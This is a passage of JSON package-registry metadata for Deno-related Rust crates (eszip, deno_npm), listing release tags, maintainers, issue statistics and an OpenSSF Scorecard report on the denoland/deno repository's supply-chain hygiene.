-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T19:12:57.863Z","dependent_packages_count":8,"downloads":552413,"downloads_period":"total","dependent_repos_count":12,"rankings":{"downloads":5.358666207701633,"dependent_repos_count":7.366734787067604,"dependent_packages_count":4.227386699599566,"stargazers_count":11.01516081236811,"forks_count":11.475532535963954,"docker_downloads_count":6.771453164177988,"average":7.702489034479808},"purl":"pkg:cargo/eszip","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/eszip","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/eszip","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/eszip/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:59:39.254Z","updated_at":"2022-11-07T18:59:39.254Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-22T15:45:43.463Z","updated_at":"2023-07-22T15:45:43.463Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":7404177,"name":"deno_npm","ecosystem":"cargo","description":"npm registry client and dependency resolver used in the Deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":107,"first_release_published_at":"2023-04-05T19:42:17.652Z","latest_release_published_at":"2026-08-06T11:46:22.730Z","latest_release_number":"0.69.0","last_synced_at":"2026-08-29T21:57:37.345Z","created_at":"2023-04-05T20:21:26.637Z","updated_at":"2026-08-29T21:57:37.345Z","registry_url":"https://crates.io/crates/deno_npm/","install_command":"cargo install deno_npm","documentation_url":"https://docs.rs/deno_npm/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using 